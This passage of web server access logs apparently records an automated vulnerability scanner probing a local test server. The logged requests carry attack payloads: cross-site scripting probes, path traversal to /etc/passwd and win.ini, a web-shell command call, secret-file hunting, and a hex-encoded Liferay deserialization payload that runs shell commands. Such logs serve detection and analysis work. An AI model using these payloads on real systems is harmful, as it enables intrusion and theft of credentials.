AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/jsonws/invoke HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /InsightPluginShowGeneralConfiguration.jspa; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/25 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?noptin_ns=email_click&to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htmltopdf/downfile.php?filename=/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.snyk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"--871a4a346a547cf05cb83f57b9ebcb83\x0D\x0AContent-Disposition: form-data; name=\x22files\x22; filename=\x22test.tar\x22\x0D\x0A\x0D\x0A../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 0000000000000029KD23X2zRU75wRD9Oljm3y5UUL\x0D\x0A--871a4a346a547cf05cb83f57b9ebcb83--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/UploadServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hybris/hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%09/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /groovyconsole HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET / HTTP/1.0","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /confluence HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DEBUG /Foobar-debug.aspx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"DEBUG", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /je/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/26 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/dashboard?maxResults=100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpfastcache/phpfastcache/examples/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /em/console/logon/logon HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", 